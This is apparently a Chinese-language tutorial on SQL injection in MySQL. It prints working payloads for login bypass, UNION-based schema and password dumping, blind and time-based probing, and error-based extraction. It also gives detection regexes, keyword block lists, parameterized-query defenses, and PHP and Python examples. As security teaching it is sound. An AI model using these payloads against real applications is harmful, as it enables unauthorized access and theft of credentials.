SQL 注入概述
SQL 注入是一种代码注入技术,攻击者通过在应用程序的输入字段中插入恶意 SQL 代码,来操作数据库执行非预期的操作。这是 Web 应用程序中最常见和最危险的安全漏洞之一。
🎯 数据泄露
获取敏感数据如用户密码、个人信息、商业机密等
🗑️ 数据破坏
删除或修改重要数据,破坏数据完整性
🔓 权限提升
绕过身份验证,获得管理员权限
💻 系统控制
在某些情况下可能获得服务器控制权
⚠️ SQL 注入的严重后果:
- 敏感数据泄露(用户信息、财务数据)
- 数据完整性被破坏
- 身份验证绕过
- 拒绝服务攻击
- 系统完全被控制
- 法律和合规问题
- 品牌声誉损害
SQL 注入攻击类型
1. 经典 SQL 注入
-- 创建示例表
CREATE TABLE users (
id INT AUTO_INCREMENT PRIMARY KEY,
username VARCHAR(50) UNIQUE,
password VARCHAR(255),
email VARCHAR(100),
role VARCHAR(20) DEFAULT 'user',
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);
INSERT INTO users (username, password, email, role) VALUES
('admin', 'admin123', 'admin@example.com', 'admin'),
('john_doe', 'password123', 'john@example.com', 'user'),
('jane_smith', 'secret456', 'jane@example.com', 'user'),
('bob_wilson', 'mypass789', 'bob@example.com', 'user');
-- 易受攻击的查询示例(不要在生产环境使用)
-- 假设应用程序直接拼接用户输入:
-- SELECT * FROM users WHERE username = '$username' AND password = '$password'
-- 正常查询
SELECT * FROM users WHERE username = 'john_doe' AND password = 'password123';
-- 攻击示例1:绕过密码验证
-- 用户输入: username = "admin' --", password = "anything"
-- 生成的SQL: SELECT * FROM users WHERE username = 'admin' -- AND password = 'anything'
SELECT * FROM users WHERE username = 'admin' -- AND password = 'anything';
-- 攻击示例2:联合查询注入
-- 用户输入: username = "' UNION SELECT 1,2,3,4,5,6 --"
-- SELECT * FROM users WHERE username = '' UNION SELECT 1,2,3,4,5,6 -- AND password = ''
-- 攻击示例3:获取所有用户数据
-- 用户输入: username = "' OR '1'='1"
-- SELECT * FROM users WHERE username = '' OR '1'='1' AND password = ''
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';
2. 盲注攻击
-- 盲注:攻击者无法直接看到查询结果,但可以通过应用程序的行为推断信息
-- 布尔盲注示例
-- 攻击者通过观察页面是否返回结果来推断信息
-- 测试数据库名称长度
-- 如果返回结果,说明数据库名长度大于5
SELECT * FROM users WHERE id = 1 AND LENGTH(DATABASE()) > 5;
-- 逐字符猜测数据库名
-- 如果返回结果,说明数据库名第一个字符是 'm'
SELECT * FROM users WHERE id = 1 AND SUBSTRING(DATABASE(), 1, 1) = 'm';
-- 时间盲注示例
-- 通过延时来判断条件是否成立
SELECT * FROM users WHERE id = 1 AND IF(LENGTH(DATABASE()) > 5, SLEEP(5), 0);
-- 获取表名
SELECT * FROM users WHERE id = 1 AND (
SELECT COUNT(*) FROM information_schema.tables
WHERE table_schema = DATABASE() AND table_name = 'users'
) > 0;
-- 获取列名
SELECT * FROM users WHERE id = 1 AND (
SELECT COUNT(*) FROM information_schema.columns
WHERE table_schema = DATABASE()
AND table_name = 'users'
AND column_name = 'password'
) > 0;
3. 联合查询注入
-- 联合查询注入:使用 UNION 操作符获取其他表的数据
-- 首先确定原查询的列数
-- 通过 ORDER BY 确定列数
SELECT * FROM users WHERE id = 1 ORDER BY 6; -- 如果报错,说明列数少于6
SELECT * FROM users WHERE id = 1 ORDER BY 5; -- 如果不报错,说明有5列
-- 使用 UNION 获取数据库信息
SELECT id, username, password, email, role FROM users WHERE id = -1
UNION SELECT 1, DATABASE(), VERSION(), USER(), 'info';
-- 获取所有数据库名
SELECT id, username, password, email, role FROM users WHERE id = -1
UNION SELECT 1, schema_name, 'db', 'info', 'data'
FROM information_schema.schemata;
-- 获取所有表名
SELECT id, username, password, email, role FROM users WHERE id = -1
UNION SELECT 1, table_name, table_schema, 'table', 'info'
FROM information_schema.tables
WHERE table_schema = DATABASE();
-- 获取所有列名
SELECT id, username, password, email, role FROM users WHERE id = -1
UNION SELECT 1, column_name, table_name, data_type, 'column'
FROM information_schema.columns
WHERE table_schema = DATABASE() AND table_name = 'users';
-- 获取敏感数据
SELECT id, username, password, email, role FROM users WHERE id = -1
UNION SELECT id, username, password, email, role FROM users;
4. 错误注入
-- 错误注入:通过触发数据库错误来获取信息
-- 创建一个会产生错误的查询来获取信息
-- 使用 extractvalue 函数触发错误
SELECT * FROM users WHERE id = 1 AND extractvalue(1, concat(0x7e, (SELECT DATABASE()), 0x7e));
-- 使用 updatexml 函数触发错误
SELECT * FROM users WHERE id = 1 AND updatexml(1, concat(0x7e, (SELECT USER()), 0x7e), 1);
-- 通过除零错误获取信息
SELECT * FROM users WHERE id = 1 AND (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY concat(DATABASE(), floor(rand(0)*2)));
-- 获取表名通过错误
SELECT * FROM users WHERE id = 1 AND extractvalue(1, concat(0x7e, (
SELECT table_name FROM information_schema.tables
WHERE table_schema = DATABASE() LIMIT 1
), 0x7e));
-- 获取列名通过错误
SELECT * FROM users WHERE id = 1 AND extractvalue(1, concat(0x7e, (
SELECT column_name FROM information_schema.columns
WHERE table_schema = DATABASE() AND table_name = 'users' LIMIT 1
), 0x7e));
5. 二阶注入
-- 二阶注入:恶意数据先被存储,然后在另一个查询中被执行
-- 创建日志表
CREATE TABLE user_logs (
id INT AUTO_INCREMENT PRIMARY KEY,
user_id INT,
action VARCHAR(100),
details TEXT,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);
-- 第一步:插入包含恶意代码的数据
-- 假设应用程序允许用户更新用户名,但没有正确转义
INSERT INTO users (username, password, email) VALUES
("admin' OR '1'='1' --", 'password', 'evil@example.com');
-- 第二步:当应用程序使用存储的用户名构建查询时
-- 假设应用程序记录用户活动:
-- INSERT INTO user_logs (user_id, action, details)
-- VALUES (1, 'login', 'User admin' OR '1'='1' -- logged in')
-- 这可能导致意外的行为或数据泄露
-- 查看潜在的恶意用户名
SELECT id, username, 'POTENTIAL_INJECTION' as risk_level
FROM users
WHERE username LIKE "%'%"
OR username LIKE "%\"%"
OR username LIKE "%-%"
OR username LIKE "%/*%"
OR username LIKE "%*/%"
OR username LIKE "%union%"
OR username LIKE "%select%"
OR username LIKE "%drop%"
OR username LIKE "%delete%"
OR username LIKE "%update%"
OR username LIKE "%insert%";
SQL 注入检测
手动检测方法
-- 1. 单引号测试
-- 在输入中添加单引号,观察是否产生错误
-- 输入: test'
-- 如果产生SQL语法错误,可能存在注入漏洞
-- 2. 逻辑测试
-- 输入: 1' OR '1'='1
-- 输入: 1' OR '1'='2
-- 比较两次结果,如果不同可能存在注入
-- 3. 时间延迟测试
-- 输入: 1'; WAITFOR DELAY '00:00:05' --
-- 输入: 1' AND SLEEP(5) --
-- 如果页面响应延迟,可能存在注入
-- 4. 联合查询测试
-- 输入: 1' UNION SELECT NULL --
-- 输入: 1' UNION SELECT NULL, NULL --
-- 逐步增加NULL的数量,直到不报错
-- 5. 错误信息测试
-- 输入: 1' AND extractvalue(1, concat(0x7e, version(), 0x7e)) --
-- 观察是否返回数据库版本信息
自动化检测工具
常用 SQL 注入检测工具:
- SQLMap - 最流行的自动化SQL注入检测工具
- Burp Suite - Web应用安全测试平台
- OWASP ZAP - 开源Web应用安全扫描器
- Netsparker - 商业Web漏洞扫描器
- Acunetix - Web应用安全扫描器
- Havij - 自动化SQL注入工具
数据库层面的检测
-- 创建SQL注入检测日志表
CREATE TABLE security_logs (
id INT AUTO_INCREMENT PRIMARY KEY,
event_type VARCHAR(50),
query_text TEXT,
source_ip VARCHAR(45),
user_agent TEXT,
detected_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
risk_level ENUM('LOW', 'MEDIUM', 'HIGH', 'CRITICAL') DEFAULT 'LOW'
);
-- 创建检测可疑查询的存储过程
DELIMITER //
CREATE PROCEDURE DetectSQLInjection(
IN query_text TEXT,
IN source_ip VARCHAR(45),
IN user_agent TEXT
)
BEGIN
DECLARE risk_level VARCHAR(10) DEFAULT 'LOW';
DECLARE suspicious_patterns TEXT DEFAULT '';
-- 检测常见的SQL注入模式
IF query_text REGEXP '(union|select|drop|delete|update|insert).*\\-\\-' THEN
SET risk_level = 'CRITICAL';
SET suspicious_patterns = CONCAT(suspicious_patterns, 'SQL_COMMENT_INJECTION,');
END IF;
IF query_text REGEXP "(or|and)\\s+['\"]?1['\"]?\\s*=\\s*['\"]?1['\"]?" THEN
SET risk_level = 'HIGH';
SET suspicious_patterns = CONCAT(suspicious_patterns, 'TAUTOLOGY_INJECTION,');
END IF;
IF query_text REGEXP 'union\\s+select' THEN
SET risk_level = 'HIGH';
SET suspicious_patterns = CONCAT(suspicious_patterns, 'UNION_INJECTION,');
END IF;
IF query_text REGEXP '(sleep|waitfor|benchmark)\\s*\\(' THEN
SET risk_level = 'MEDIUM';
SET suspicious_patterns = CONCAT(suspicious_patterns, 'TIME_BASED_INJECTION,');
END IF;
IF query_text REGEXP '(extractvalue|updatexml)\\s*\\(' THEN
SET risk_level = 'HIGH';
SET suspicious_patterns = CONCAT(suspicious_patterns, 'ERROR_BASED_INJECTION,');
END IF;
-- 如果检测到可疑模式,记录日志
IF suspicious_patterns != '' THEN
INSERT INTO security_logs (event_type, query_text, source_ip, user_agent, risk_level)
VALUES (suspicious_patterns, query_text, source_ip, user_agent, risk_level);
END IF;
END //
DELIMITER ;
-- 测试检测功能
CALL DetectSQLInjection(
"SELECT * FROM users WHERE id = 1' OR '1'='1' --",
'192.168.1.100',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
);
CALL DetectSQLInjection(
"SELECT * FROM users WHERE id = 1 UNION SELECT 1,2,3,4,5",
'192.168.1.101',
'sqlmap/1.4.12'
);
-- 查看检测结果
SELECT * FROM security_logs ORDER BY detected_at DESC;
-- 统计安全事件
SELECT
risk_level,
COUNT(*) as event_count,
COUNT(DISTINCT source_ip) as unique_ips
FROM security_logs
GROUP BY risk_level
ORDER BY FIELD(risk_level, 'CRITICAL', 'HIGH', 'MEDIUM', 'LOW');
SQL 注入防护方法
🛡️ 参数化查询
使用预编译语句和参数绑定,最有效的防护方法
🔍 输入验证
严格验证和过滤用户输入,白名单优于黑名单
🔒 权限控制
最小权限原则,限制数据库用户权限
🚫 错误处理
不向用户显示详细的数据库错误信息
1. 参数化查询(推荐)
-- MySQL 预编译语句示例
-- 准备预编译语句
PREPARE stmt FROM 'SELECT * FROM users WHERE username = ? AND password = ?';
-- 设置参数
SET @username = 'john_doe';
SET @password = 'password123';
-- 执行查询
EXECUTE stmt USING @username, @password;
-- 清理
DEALLOCATE PREPARE stmt;
-- 即使输入包含恶意代码也是安全的
SET @username = "admin' OR '1'='1' --";
SET @password = 'anything';
PREPARE stmt FROM 'SELECT * FROM users WHERE username = ? AND password = ?';
EXECUTE stmt USING @username, @password;
-- 这将查找用户名为 "admin' OR '1'='1' --" 的用户,而不会执行注入攻击
DEALLOCATE PREPARE stmt;
-- 动态查询的安全实现
DELIMITER //
CREATE PROCEDURE SafeUserLogin(
IN p_username VARCHAR(50),
IN p_password VARCHAR(255)
)
BEGIN
SELECT id, username, email, role
FROM users
WHERE username = p_username AND password = p_password;
END //
DELIMITER ;
-- 安全调用
CALL SafeUserLogin('john_doe', 'password123');
CALL SafeUserLogin("admin' OR '1'='1' --", 'anything'); -- 安全,不会被注入
2. 输入验证和过滤
-- 创建输入验证函数
DELIMITER //
CREATE FUNCTION ValidateInput(
input_text TEXT,
input_type VARCHAR(20)
) RETURNS BOOLEAN
READS SQL DATA
DETERMINISTIC
BEGIN
DECLARE is_valid BOOLEAN DEFAULT TRUE;
-- 检查空值
IF input_text IS NULL OR TRIM(input_text) = '' THEN
RETURN FALSE;
END IF;
-- 根据类型验证
CASE input_type
WHEN 'username' THEN
-- 用户名只允许字母、数字、下划线
IF input_text NOT REGEXP '^[a-zA-Z0-9_]{3,50}$' THEN
SET is_valid = FALSE;
END IF;
WHEN 'email' THEN
-- 简单的邮箱验证
IF input_text NOT REGEXP '^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$' THEN
SET is_valid = FALSE;
END IF;
WHEN 'numeric' THEN
-- 数字验证
IF input_text NOT REGEXP '^[0-9]+$' THEN
SET is_valid = FALSE;
END IF;
WHEN 'alphanumeric' THEN
-- 字母数字验证
IF input_text NOT REGEXP '^[a-zA-Z0-9]+$' THEN
SET is_valid = FALSE;
END IF;
END CASE;
-- 检查危险关键词
IF UPPER(input_text) REGEXP '(SELECT|INSERT|UPDATE|DELETE|DROP|UNION|SCRIPT|JAVASCRIPT|VBSCRIPT)' THEN
SET is_valid = FALSE;
END IF;
-- 检查SQL注入模式
IF input_text REGEXP "(\\-\\-|\\/\\*|\\*\\/|;|\\||&|<|>|\\')" THEN
SET is_valid = FALSE;
END IF;
RETURN is_valid;
END //
DELIMITER ;
-- 测试验证函数
SELECT
'john_doe' as input,
ValidateInput('john_doe', 'username') as is_valid_username;
SELECT
"admin' OR '1'='1' --" as input,
ValidateInput("admin' OR '1'='1' --", 'username') as is_valid_username;
SELECT
'user@example.com' as input,
ValidateInput('user@example.com', 'email') as is_valid_email;
SELECT
'DROP TABLE users' as input,
ValidateInput('DROP TABLE users', 'username') as is_valid_username;
-- 创建安全的用户注册过程
DELIMITER //
CREATE PROCEDURE SafeRegisterUser(
IN p_username VARCHAR(50),
IN p_password VARCHAR(255),
IN p_email VARCHAR(100)
)
BEGIN
DECLARE validation_error VARCHAR(255) DEFAULT '';
-- 验证输入
IF NOT ValidateInput(p_username, 'username') THEN
SET validation_error = 'Invalid username format';
ELSEIF NOT ValidateInput(p_email, 'email') THEN
SET validation_error = 'Invalid email format';
ELSEIF LENGTH(p_password) < 8 THEN
SET validation_error = 'Password must be at least 8 characters';
END IF;
-- 如果验证失败,返回错误
IF validation_error != '' THEN
SELECT validation_error as error_message;
ELSE
-- 检查用户名是否已存在
IF EXISTS(SELECT 1 FROM users WHERE username = p_username) THEN
SELECT 'Username already exists' as error_message;
ELSE
-- 安全插入新用户
INSERT INTO users (username, password, email)
VALUES (p_username, p_password, p_email);
SELECT 'User registered successfully' as success_message;
END IF;
END IF;
END //
DELIMITER ;
-- 测试安全注册
CALL SafeRegisterUser('newuser', 'password123', 'newuser@example.com');
CALL SafeRegisterUser("admin' OR '1'='1' --", 'password', 'evil@example.com');
3. 权限控制
-- 创建专用的应用程序数据库用户
-- 不要使用 root 或管理员账户连接应用程序
-- 创建只读用户(用于查询操作)
CREATE USER 'app_readonly'@'localhost' IDENTIFIED BY 'strong_password_123';
GRANT SELECT ON myapp.users TO 'app_readonly'@'localhost';
GRANT SELECT ON myapp.user_logs TO 'app_readonly'@'localhost';
-- 创建有限写入权限的用户(用于应用程序操作)
CREATE USER 'app_user'@'localhost' IDENTIFIED BY 'another_strong_password_456';
GRANT SELECT, INSERT, UPDATE ON myapp.users TO 'app_user'@'localhost';
GRANT SELECT, INSERT ON myapp.user_logs TO 'app_user'@'localhost';
-- 注意:不给予 DELETE, DROP, CREATE, ALTER 权限
-- 创建备份用户(仅用于备份操作)
CREATE USER 'backup_user'@'localhost' IDENTIFIED BY 'backup_password_789';
GRANT SELECT, LOCK TABLES ON myapp.* TO 'backup_user'@'localhost';
-- 查看用户权限
SHOW GRANTS FOR 'app_readonly'@'localhost';
SHOW GRANTS FOR 'app_user'@'localhost';
-- 限制危险函数的使用
-- 在 MySQL 配置中禁用危险函数
-- SET GLOBAL log_bin_trust_function_creators = 0;
-- 创建安全视图,隐藏敏感列
CREATE VIEW safe_users_view AS
SELECT
id,
username,
email,
role,
created_at
FROM users;
-- 不包含 password 列
-- 给应用程序用户授权视图而不是原表
GRANT SELECT ON myapp.safe_users_view TO 'app_readonly'@'localhost';
-- 撤销对原表的直接访问(如果之前授权过)
-- REVOKE ALL ON myapp.users FROM 'app_readonly'@'localhost';
4. 错误处理和日志记录
-- 创建安全的错误处理机制
-- 创建错误日志表
CREATE TABLE error_logs (
id INT AUTO_INCREMENT PRIMARY KEY,
error_type VARCHAR(50),
error_message TEXT,
query_hash VARCHAR(64), -- 查询的哈希值,不记录实际查询
source_ip VARCHAR(45),
user_agent TEXT,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);
-- 创建安全的查询执行函数
DELIMITER //
CREATE PROCEDURE SafeExecuteQuery(
IN query_type VARCHAR(20),
IN param1 VARCHAR(255),
IN param2 VARCHAR(255),
IN source_ip VARCHAR(45)
)
BEGIN
DECLARE EXIT HANDLER FOR SQLEXCEPTION
BEGIN
-- 记录错误但不暴露详细信息
INSERT INTO error_logs (error_type, error_message, source_ip)
VALUES ('SQL_ERROR', 'Database operation failed', source_ip);
-- 返回通用错误消息
SELECT 'An error occurred. Please try again later.' as error_message;
END;
-- 根据查询类型执行相应操作
CASE query_type
WHEN 'login' THEN
SELECT id, username, email, role
FROM users
WHERE username = param1 AND password = param2;
WHEN 'get_user' THEN
SELECT id, username, email, role
FROM users
WHERE id = CAST(param1 AS UNSIGNED);
ELSE
SELECT 'Invalid query type' as error_message;
END CASE;
END //
DELIMITER ;
-- 创建审计日志
CREATE TABLE audit_logs (
id INT AUTO_INCREMENT PRIMARY KEY,
user_id INT,
action VARCHAR(50),
table_name VARCHAR(50),
record_id INT,
old_values JSON,
new_values JSON,
source_ip VARCHAR(45),
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);
-- 创建审计触发器
DELIMITER //
CREATE TRIGGER users_audit_update
AFTER UPDATE ON users
FOR EACH ROW
BEGIN
INSERT INTO audit_logs (
user_id, action, table_name, record_id,
old_values, new_values, source_ip
) VALUES (
NEW.id, 'UPDATE', 'users', NEW.id,
JSON_OBJECT(
'username', OLD.username,
'email', OLD.email,
'role', OLD.role
),
JSON_OBJECT(
'username', NEW.username,
'email', NEW.email,
'role', NEW.role
),
@source_ip
);
END //
DELIMITER ;
-- 测试安全查询执行
CALL SafeExecuteQuery('login', 'john_doe', 'password123', '192.168.1.100');
CALL SafeExecuteQuery('get_user', '1', '', '192.168.1.100');
-- 查看日志
SELECT * FROM error_logs;
SELECT * FROM audit_logs;
代码层面的防护
PHP 防护示例
<?php
// 错误的做法 - 容易受到SQL注入攻击
function vulnerableLogin($username, $password) {
$connection = new mysqli("localhost", "user", "pass", "database");
// 直接拼接用户输入 - 危险!
$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = $connection->query($query);
return $result->fetch_assoc();
}
// 正确的做法 - 使用预编译语句
function secureLogin($username, $password) {
$connection = new mysqli("localhost", "user", "pass", "database");
// 使用预编译语句
$stmt = $connection->prepare("SELECT id, username, email, role FROM users WHERE username = ? AND password = ?");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
$result = $stmt->get_result();
return $result->fetch_assoc();
}
// 输入验证函数
function validateInput($input, $type) {
// 基本清理
$input = trim($input);
$input = stripslashes($input);
$input = htmlspecialchars($input);
switch($type) {
case 'username':
return preg_match('/^[a-zA-Z0-9_]{3,50}$/', $input);
case 'email':
return filter_var($input, FILTER_VALIDATE_EMAIL);
case 'numeric':
return is_numeric($input);
default:
return false;
}
}
// 安全的用户注册
function secureRegister($username, $password, $email) {
// 验证输入
if (!validateInput($username, 'username')) {
return ['error' => 'Invalid username format'];
}
if (!validateInput($email, 'email')) {
return ['error' => 'Invalid email format'];
}
if (strlen($password) < 8) {
return ['error' => 'Password must be at least 8 characters'];
}
$connection = new mysqli("localhost", "user", "pass", "database");
// 检查用户名是否已存在
$stmt = $connection->prepare("SELECT id FROM users WHERE username = ?");
$stmt->bind_param("s", $username);
$stmt->execute();
if ($stmt->get_result()->num_rows > 0) {
return ['error' => 'Username already exists'];
}
// 哈希密码
$hashedPassword = password_hash($password, PASSWORD_DEFAULT);
// 插入新用户
$stmt = $connection->prepare("INSERT INTO users (username, password, email) VALUES (?, ?, ?)");
$stmt->bind_param("sss", $username, $hashedPassword, $email);
if ($stmt->execute()) {
return ['success' => 'User registered successfully'];
} else {
return ['error' => 'Registration failed'];
}
}
// 使用示例
$result = secureLogin($_POST['username'], $_POST['password']);
if ($result) {
echo "Login successful";
} else {
echo "Invalid credentials";
}
?>
Python 防护示例
import mysql.connector
import re
import hashlib
from mysql.connector import Error
class SecureDatabase:
def __init__(self, host, user, password, database):
self.connection = mysql.connector.connect(
host=host,
user=user,
password=password,
database=database
)
def validate_input(self, input_value, input_type):
"""验证输入数据"""
if not input_value or not input_value.strip():
return False
input_value = input_value.strip()
patterns = {
'username': r'^[a-zA-Z0-9_]{3,50}$',
'email': r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$',
'numeric': r'^[0-9]+$'
}
if input_type in patterns:
return bool(re.match(patterns[input_type], input_value))
# 检查危险关键词
dangerous_keywords = ['select', 'insert', 'update', 'delete', 'drop', 'union', 'script']
for keyword in dangerous_keywords:
if keyword.lower() in input_value.lower():
return False
# 检查SQL注入模式
injection_patterns = [r"--", r"/\*", r"\*/", r";", r"\|", r"&", r"<", r">", r"'"]
for pattern in injection_patterns:
if re.search(pattern, input_value):
return False
return True
def secure_login(self, username, password):
"""安全的用户登录"""
try:
# 验证输入
if not self.validate_input(username, 'username'):
return {'error': 'Invalid username format'}
cursor = self.connection.cursor(dictionary=True)
# 使用参数化查询
query = "SELECT id, username, email, role, password FROM users WHERE username = %s"
cursor.execute(query, (username,))
user = cursor.fetchone()
if user and self.verify_password(password, user['password']):
# 不返回密码
del user['password']
return {'success': True, 'user': user}
else:
return {'error': 'Invalid credentials'}
except Error as e:
# 记录错误但不暴露给用户
self.log_error('LOGIN_ERROR', str(e))
return {'error': 'Login failed. Please try again.'}
finally:
cursor.close()
def secure_register(self, username, password, email):
"""安全的用户注册"""
try:
# 验证输入
if not self.validate_input(username, 'username'):
return {'error': 'Invalid username format'}
if not self.validate_input(email, 'email'):
return {'error': 'Invalid email format'}
if len(password) < 8:
return {'error': 'Password must be at least 8 characters'}
cursor = self.connection.cursor()
# 检查用户名是否已存在
check_query = "SELECT id FROM users WHERE username = %s"
cursor.execute(check_query, (username,))
if cursor.fetchone():
return {'error': 'Username already exists'}
# 哈希密码
hashed_password = self.hash_password(password)
# 插入新用户
insert_query = "INSERT INTO users (username, password, email) VALUES (%s, %s, %s)"
cursor.execute(insert_query, (username, hashed_password, email))
self.connection.commit()
return {'success': 'User registered successfully'}
except Error as e:
self.connection.rollback()
self.log_error('REGISTER_ERROR', str(e))
return {'error': 'Registration failed. Please try again.'}
finally:
cursor.close()
def hash_password(self, password):
"""哈希密码"""
import bcrypt
return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt())
def verify_password(self, password, hashed):
"""验证密码"""
import bcrypt
return bcrypt.checkpw(password.encode('utf-8'), hashed.encode('utf-8'))
def log_error(self, error_type, error_message):
"""记录错误日志"""
try:
cursor = self.connection.cursor()
log_query = "INSERT INTO error_logs (error_type, error_message) VALUES (%s, %s)"
cursor.execute(log_query, (error_type, error_message))
self.connection.commit()
except:
pass # 静默处理日志错误
finally:
cursor.close()
# 使用示例
db = SecureDatabase('localhost', 'app_user', 'password', 'myapp')
# 安全登录
result = db.secure_login('john_doe', 'password123')
print(result)
# 安全注册
result = db.secure_register('newuser', 'securepass123', 'newuser@example.com')
print(result)
防护策略总结
防护方法 | 有效性 | 实现难度 | 性能影响 | 推荐程度 |
---|---|---|---|---|
参数化查询 | 极高 | 低 | 极小 | 强烈推荐 |
输入验证 | 高 | 中等 | 小 | 推荐 |
权限控制 | 高 | 中等 | 无 | 推荐 |
错误处理 | 中等 | 低 | 无 | 推荐 |
字符转义 | 低 | 低 | 小 | 不推荐 |
黑名单过滤 | 低 | 中等 | 中等 | 不推荐 |
🛡️ 综合防护策略(推荐):
- 主要防线:使用参数化查询/预编译语句
- 输入层:严格的输入验证和白名单过滤
- 权限层:最小权限原则,专用数据库用户
- 应用层:安全的错误处理,不暴露敏感信息
- 监控层:实时监控和日志记录
- 网络层:使用 WAF(Web应用防火墙)
⚠️ 常见防护误区:
- 仅依赖字符转义(容易被绕过)
- 使用黑名单过滤(无法覆盖所有攻击向量)
- 只在前端验证输入(可被绕过)
- 使用管理员权限连接数据库
- 向用户显示详细的数据库错误
- 认为存储过程完全安全(仍可能被注入)
-- 清理示例对象
DROP TRIGGER IF EXISTS users_audit_update;
DROP TABLE IF EXISTS audit_logs;
DROP TABLE IF EXISTS error_logs;
DROP TABLE IF EXISTS security_logs;
DROP TABLE IF EXISTS user_logs;
DROP TABLE IF EXISTS users;
DROP PROCEDURE IF EXISTS SafeExecuteQuery;
DROP PROCEDURE IF EXISTS DetectSQLInjection;
DROP PROCEDURE IF EXISTS SafeRegisterUser;
DROP FUNCTION IF EXISTS ValidateInput;
DROP VIEW IF EXISTS safe_users_view;
-- 清理用户(在生产环境中要谨慎)
-- DROP USER IF EXISTS 'app_readonly'@'localhost';
-- DROP USER IF EXISTS 'app_user'@'localhost';
-- DROP USER IF EXISTS 'backup_user'@'localhost';
SELECT 'SQL injection prevention tutorial completed. All example objects cleaned up.' AS message;